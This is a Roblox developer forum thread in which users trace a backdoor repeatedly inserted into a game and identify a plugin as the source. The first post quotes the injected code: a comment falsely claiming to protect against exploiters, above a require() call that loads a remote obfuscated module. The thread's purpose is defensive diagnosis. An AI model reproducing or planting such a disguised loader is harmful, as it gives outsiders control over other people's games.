Virus in my game

RobloxNoob1203 · January 2, 2020, 4:37am

There is a virus that keeps getting inserted into my game that doesn’t have free models.

--This an script of ROBLOX Studio. Do not delete it, this script secures your game from exploiters.

--Thanks.


require(4509414898):dab()

This is the module it keeps putting in :
https://www.roblox.com/library/4509414898/Henlo-my-skid

sjr04 · January 2, 2020, 4:38am

The issue is probably from a plugin. Delete any plugins that look suspicious to you.

RobloxNoob1203 · January 2, 2020, 4:39am

I have no suspicious plugins, I’ve used the plugins I used for years without error or viruses.

RobloxNoob1203 · January 2, 2020, 4:40am

Should I try to remove the plugins that don’t show in the Plugins tab?

sjr04 · January 2, 2020, 4:41am

Maybe it’s from a new plugin you got? Or maybe the creator of an already existing plugin went rogue.

mavqrk · January 2, 2020, 4:41am

Have you tried fixing it by using Ro Defender plugin to remove the virus or any virus remover plugin in roblox?

RobloxNoob1203 · January 2, 2020, 4:42am

I haven’t yet as of right now so I’ll try.

RobloxNoob1203 · January 2, 2020, 4:45am

As of now, I’ve disabled every single plugin I have and it said.

[22:43:40.117 - Baseplate auto-recovery file was created](rbxopenfile://C:/Users//OneDrive/Documents/ROBLOX/AutoSaves)

[22:43:43.210 - Unable to find module for asset id](rbxopenscript://www.dummy.com/dummy?scriptGuid=%7BCB39FC31%2D1306%2D422F%2DA465%2D4F5C510E5BC4%7D&gst=6#169207)

22:43:43.210 - Stack Begin

[22:43:43.212 - Script 'Model.MainModule', Line 169207 - field ?](rbxopenscript://www.dummy.com/dummy?scriptGuid=%7BCB39FC31%2D1306%2D422F%2DA465%2D4F5C510E5BC4%7D&gst=6#169207)

[22:43:43.212 - Script 'Model.MainModule', Line 6 - field ?](rbxopenscript://www.dummy.com/dummy?scriptGuid=%7B9D0671A0%2DDFEF%2D499A%2D834C%2D860E4E7AC4DE%7D&gst=6#6)

[22:43:43.212 - Script 'Model.MainModule', Line 6](rbxopenscript://www.dummy.com/dummy?scriptGuid=%7B9D0671A0%2DDFEF%2D499A%2D834C%2D860E4E7AC4DE%7D&gst=6#6)

22:43:43.212 - Stack End

[22:43:43.213 - Luraph Script:1: Unable to find module for asset id](rbxopenscript://www.dummy.com/dummy?scriptGuid=%7B9D0671A0%2DDFEF%2D499A%2D834C%2D860E4E7AC4DE%7D&gst=6#6)

22:43:43.213 - Stack Begin

[22:43:43.213 - Script 'Model.MainModule', Line 6](rbxopenscript://www.dummy.com/dummy?scriptGuid=%7B9D0671A0%2DDFEF%2D499A%2D834C%2D860E4E7AC4DE%7D&gst=6#6)

[22:43:43.214 - Script 'Model.MainModule', Line 6 - local iIiiIIIi1lIiilliIII](rbxopenscript://www.dummy.com/dummy?scriptGuid=%7B9D0671A0%2DDFEF%2D499A%2D834C%2D860E4E7AC4DE%7D&gst=6#6)

[22:43:43.214 - Script 'Model.MainModule', Line 6 - method dab](rbxopenscript://www.dummy.com/dummy?scriptGuid=%7B9D0671A0%2DDFEF%2D499A%2D834C%2D860E4E7AC4DE%7D&gst=6#6)

[22:43:43.214 - Script 'ServerScriptService.Script', Line 7](rbxopenscript://www.dummy.com/dummy?scriptGuid=%7B31B429ED%2D27E7%2D4D2C%2D97F9%2D1C4A2C559E21%7D&gst=3#7)

22:43:43.215 - Stack End

[22:43:43.215 - Luraph Script:1: Unable to find module for asset id](rbxopenscript://www.dummy.com/dummy?scriptGuid=%7B9D0671A0%2DDFEF%2D499A%2D834C%2D860E4E7AC4DE%7D&gst=6#6)

22:43:43.215 - Stack Begin

[22:43:43.216 - Script 'Model.MainModule', Line 6 - field ?](rbxopenscript://www.dummy.com/dummy?scriptGuid=%7B9D0671A0%2DDFEF%2D499A%2D834C%2D860E4E7AC4DE%7D&gst=6#6) (x2)

[22:43:43.216 - Script 'Model.MainModule', Line 6](rbxopenscript://www.dummy.com/dummy?scriptGuid=%7B9D0671A0%2DDFEF%2D499A%2D834C%2D860E4E7AC4DE%7D&gst=6#6)

22:43:43.216 - Stack End

RobloxNoob1203 · January 2, 2020, 4:46am

Which the module uses a Luraph decoder which it says Luraph Script inside of it.

RobloxNoob1203 · January 2, 2020, 4:47am

Now it’s just gone… Might as well try out every single plugin to see if one inserts the virus.

RobloxNoob1203 · January 2, 2020, 4:54am

I had it, it is this one : https://web.roblox.com/library/4110705448/Gui-to-Lua because I was trying one at a time and this one produced the error that was in the output thing I sent.

RobloxNoob1203 · January 2, 2020, 4:54am

Just install it and see that this supposedly culprit is the culprit of that.

firsttobebear · January 2, 2020, 5:03am

yea be careful of using plugins many of them have back-doors. And yea I would suggest snooping through the scripts to see exactly like legendary did

RobloxNoob1203 · January 2, 2020, 5:09am

Wait, how do you even look inside of the plugin’s scripts?

ForbiddenJ · January 2, 2020, 6:04am

I’ve traced the malware chain back to a copylocked asset by the same user. I assume he only puts it on sale when he wants to go wreak havoc in an unsuspecting someone’s world.

ForbiddenJ · January 2, 2020, 6:12am

Just replace the global require function with a function that prints out its arguments. lol

ForbiddenJ · January 2, 2020, 6:16am

By replacing the require function before the obfuscated code runs, you can see what the obfuscated script is trying to load.

It’s as simple as this:

require = print